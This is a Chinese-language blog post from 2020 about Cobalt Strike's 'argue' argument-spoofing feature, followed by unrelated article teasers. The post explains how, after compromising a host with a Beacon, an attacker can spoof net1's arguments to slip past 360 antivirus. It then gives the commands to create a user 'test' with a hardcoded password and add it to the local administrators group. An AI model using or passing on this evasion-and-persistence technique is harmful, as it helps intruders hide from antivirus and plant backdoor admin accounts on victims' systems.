CobaltStrike的argue參數污染繞AV

原創 谢公子 2020-06-24 21:12

在獲取了對方主機CobaltStrike Beacon後,需要執行一些敏感的操作(如創建用戶等)。但是目標主機有AV,執行敏感命令會直接報毒等,這時我們可以使用Cobaltstrike自帶的argue參數污染來執行敏感操作。

使用argue參數污染創建新用戶並加入管理員組中

使用前提:administrator 或 system權限。

執行創建新用戶命令,360報毒

使用argus參數污染 net1 

#參數污染net1
argue net1 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

#查看污染的參數
argue

用污染的 net1 創建用戶,發現創建成功,360也不報毒

#用污染的net1執行敏感操作
execute net1 user test root123 /add
execute net1 localgroup administrators test /add

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

AD Explorer的使用

AD Explorer AD Explorer是域內一款信息查詢工具,它是獨立的可執行文件,無需安裝。它能夠列出域組織架構、用戶賬號、計算機賬號等,它可以幫助你尋找特權用戶和數據庫服務器等敏感目標。 AD Explorer的使用 在域內任

谢公子 2020-07-07 00:30:51

域查詢工具Adfind的用法

使用: AdFind.exe [switches] [-b basedn] [-f filter] [attr list] -b:指定要查詢的根節點 -f:LDAP過濾條件 attr list:需要顯示的屬性 例如: #查看域

谢公子 2020-07-07 00:30:51

Android Studio安裝genymotion插件

File->settings 點擊Plugins,找到Browse repositories... 輸入Genymotion,搜索到Genymotion後,點擊Install 重啓後,就ok了

然夏莫非 2020-07-05 19:56:17

AndroidStudio刪除項目

右鍵左上角的 項目名 右鍵 》 delete 磁盤裏的文件還需要手動刪除

然夏莫非 2020-07-05 19:56:17

exe4j把jar打包成exe文件,運行報錯的解決辦法!!!

  exe4j把jar打包成exe文件,雙擊運行exe文件,報錯如下:上網仔細查找,有的說JDK環境變量配置不對,有的說是exe4j打包是的JRE版本不應該配置最大版本號,其實這些都不是我的問題所在而是在打包是有如下選項:因爲我安裝的JD

xuyangtiger1 2020-07-05 03:12:19

ES6開發-babel

大部分瀏覽器還不支持es6語法,需要搭建es6的開發環境將es6編譯成es5 使用Bable將ES6編譯成ES5 創建工程目錄爲Test,命令npm init -y生成的默認的package.json(下載代碼後就只需要執行

丫an梅 2020-07-05 00:47:31

使用itext實現pdf圖片簽章 使用itext實現pdf圖片簽章

使用itext實現pdf圖片簽章 原創 _再見阿郎_ 最後發佈於2018-03-02 18:04:53 閱讀數 4749

zhangjunli 2020-07-03 20:58:58

uboot tftp服務

遇到的困難與解決過程就不廢話了。。。直接說正確步驟: * 準備: 目標板下載好uboot , 打開DNW之類的通信工具,設置目標板,代碼如下: u-boot>setenv ipaddr 192.168.1.100 #設定目標板ip u-b

wwd574000815 2020-07-01 19:10:01

notepad + +使用

詳見:https://www.crifan.com/files/doc/docbook/rec_soft_npp/release/htmls/npp_plugins.html notepad + +使用 改變主題 功能快捷鍵

wst0717 2020-06-30 15:59:07

bupsuit之compare

分析數據包不同 在數據包歷史處,選擇需要對比分析的數據包發送至compare模塊 compare模塊

wst0717 2020-06-30 15:59:07

Cenos7常用命令

CentOS7 常用命令集合        這兩天一直在對CentOS 7.2進行初體驗,各種學習命令腫麼用,不過其實大多和DOS是一樣的,只是命令的表達上可能有點兒不一樣,畢竟這些都不是一家出來的嘛~        廢話不多說,直接上命

Zach_ZSZ 2020-06-30 08:21:05

Intellij IDEA 工具的基本操作

以下具體操作是基於Intellij IDEA2019.3.3進行 1、刪除module項目 open medule settings->點擊module項目->點擊“-”->然後返回界面有一個delete刪除,就可以從本地刪除。

RyxyR 2020-06-29 06:02:33

虛擬機的搭建

虛擬機搭建: 一種是引入別人的虛擬機直接導入就可以直接使用(.ova文件) 另一種需要自己在vmware或是virtualbox中創建虛擬機然後導入鏡像(iso文件) 然後安裝系統     使用第一種導入的方式參考教程: VirtualB

你叫啥啊 2020-06-28 08:05:27

sql優化的操作

今天公司開了個會,具體的是一個技術交流會,主要針對的sql優化這方面的,還真是讓學到了不少:主要有下面這些 左連接(left join on / left outer join on) left join 是left outer joi

kay三石 2020-06-26 18:09:38

實習三個月小記

一眨眼的功夫實習三個月已經過去了,回想一下這三個月過得特別的快,那麼這三個月時間我都都做了些什麼呢,和了解些什麼呢,下面是我總結出來的這將近三個月來所學習到的和所遇到的問題: 1.python+appium+pytest自動化安卓

kay三石 2020-06-26 18:09:37